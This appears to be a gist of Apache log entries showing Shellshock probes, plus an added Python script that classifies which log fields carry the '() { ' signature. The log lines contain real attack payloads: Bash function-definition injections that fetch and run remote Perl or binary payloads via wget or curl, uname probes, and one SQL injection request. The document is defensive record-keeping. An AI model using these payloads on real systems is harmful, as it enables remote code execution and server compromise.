@brendano
Created October 12, 2014 19:05
Shellshock attack attempts I noticed in apache logs, from grep '()' ... the shellshock-scan one I think I initiated but I think the rest are attack attempts.
209.126.230.72 - - [24/Sep/2014:22:55:07 -0400] "GET / HTTP/1.0" 301 - "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
94.228.220.68 - - [25/Sep/2014:01:17:15 -0400] "GET /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,4,5,group_concat(0x3C6B65793E,version(),0x3C6B6579733E)-- HTTP/1.1" 200 31516 "-" "-"
89.207.135.125 - - [25/Sep/2014:06:59:58 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 302 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:14:32 -0400] "GET / HTTP/1.1" 301 - "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
54.251.83.67 - - [26/Sep/2014:15:55:50 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
114.91.105.103 - - [27/Sep/2014:09:36:34 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c 'wget http://sts01.com/.../reg.sh -O /tmp/reg.sh && /bin/bash /tmp/reg.sh http://197.242.148.29:8088 66.228.39.121'"
188.138.33.11 - - [27/Sep/2014:11:02:02 -0400] "GET /cgi-sys/php5? HTTP/1.1" 404 210 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
209.222.148.184 - - [28/Sep/2014:18:11:23 -0400] "GET /cgi-sys/php5 HTTP/1.1" 404 210 "-" "() { 0v3r1d3;};echo \"Content-type: text/plain\"; echo; uname -a;"
82.221.128.246 - - [29/Sep/2014:02:31:34 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
74.112.131.246 - - [01/Oct/2014:22:19:59 -0400] "GET /blog/2009/09/dont-mawk-awk-the-fastest-and-most-elegant-big-data-munging-language/ HTTP/1.1" 200 20457 "-" "Mozilla/5.0 ()"
74.112.131.243 - - [01/Oct/2014:22:21:01 -0400] "GET /blog/2009/09/dont-mawk-awk-the-fastest-and-most-elegant-big-data-munging-language/ HTTP/1.1" 200 20456 "-" "Mozilla/5.0 ()"
54.213.225.160 - - [02/Oct/2014:17:22:16 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;"
211.154.173.239 - - [03/Oct/2014:10:06:11 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget https://173.15.111.29/user --no-check-certificate;curl -O https://173.15.111.29/user -k ; perl /tmp/user;rm -rf /tmp/user\""
67.214.182.202 - - [03/Oct/2014:16:54:13 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo"
95.110.178.157 - - [04/Oct/2014:15:45:47 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi* HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*"
24.160.166.96 - - [04/Oct/2014:22:52:31 -0400] "GET / HTTP/1.1" 200 31825 "-" "() { :;}; /bin/bash -c \"curl -O http://89.248.172.139/ha.pl -o /tmp/ha.pl; lwp-download -a http://89.248.172.139/ha.pl /tmp/ha.pl;wget http://89.248.172.139/ha.pl -O /tmp/ha.pl;perl /tmp/ha.pl;rm -f /tmp/ha.pl;mkdir /tmp/ha.pl\""
162.144.46.158 - - [05/Oct/2014:06:06:46 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi* HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*"
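
An added triage example (not part of the original gist, and not the author's code): `grep '()'` also matches lines such as the SQL `version()` request and the `Mozilla/5.0 ()` agents above, so this sketch parses each combined-format line and reports which field carries the `() {` function-definition prefix. The function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Apache combined format: host ident user [time] "request" status bytes "referer" "agent".
# Quoted fields may hold backslash-escaped quotes (\"), as several lines above do.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' \d{3} \S+ ' + QUOTED + ' ' + QUOTED + r'\s*$'
)
# Vulnerable Bash parsed an environment value starting with "() {" as a function
# definition; a bare "()" (all that grep '()' requires) is not the signature.
FUNC_DEF = "() {"

def classify(line):
    """Return (host, names of fields containing '() {'), or None if unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    host, request, referer, agent = m.groups()
    fields = {"request": request, "referer": referer, "user-agent": agent}
    return host, [name for name, value in fields.items() if FUNC_DEF in value]

def scan(lines):
    """Triage lines that grep '()' would match: Shellshock hits, other, unparsed."""
    hits, other, unparsed = [], [], []
    for line in lines:
        if "()" not in line:
            continue
        result = classify(line)
        if result is None:
            unparsed.append(line)      # keep for manual review, never drop silently
        elif result[1]:
            hits.append(result)
        else:
            other.append(result[0])    # "()" from something else, e.g. SQL version()
    return hits, other, unparsed

# Constructed sample lines modelled on the log above (documentation-range addresses).
SAMPLE = [
    '192.0.2.10 - - [25/Sep/2014:06:59:58 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 302 "-" "() { :;}; /bin/ping -c 1 198.51.100.7"',
    '192.0.2.11 - - [26/Sep/2014:15:55:50 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \\"echo testing\\"; /bin/uname -a"',
    '192.0.2.12 - - [25/Sep/2014:01:17:15 -0400] "GET /index.php?id=1+UNION+SELECT+version()-- HTTP/1.1" 200 31516 "-" "-"',
    '192.0.2.13 - - [01/Oct/2014:22:19:59 -0400] "GET /blog/ HTTP/1.1" 200 20457 "-" "Mozilla/5.0 ()"',
    '192.0.2.14 - - [02/Oct/2014:17:22:16 -0400] "GET /?x=() { :; }; echo probe HTTP/1.0" 301 233 "() { :; }; echo probe" "() { :; }; echo probe"',
]

if __name__ == "__main__":
    hits, other, unparsed = scan(SAMPLE)
    for host, fields in hits:
        print(host, "shellshock pattern in:", ", ".join(fields))
    print("matched '()' only:", other, "| unparsed:", len(unparsed))
```
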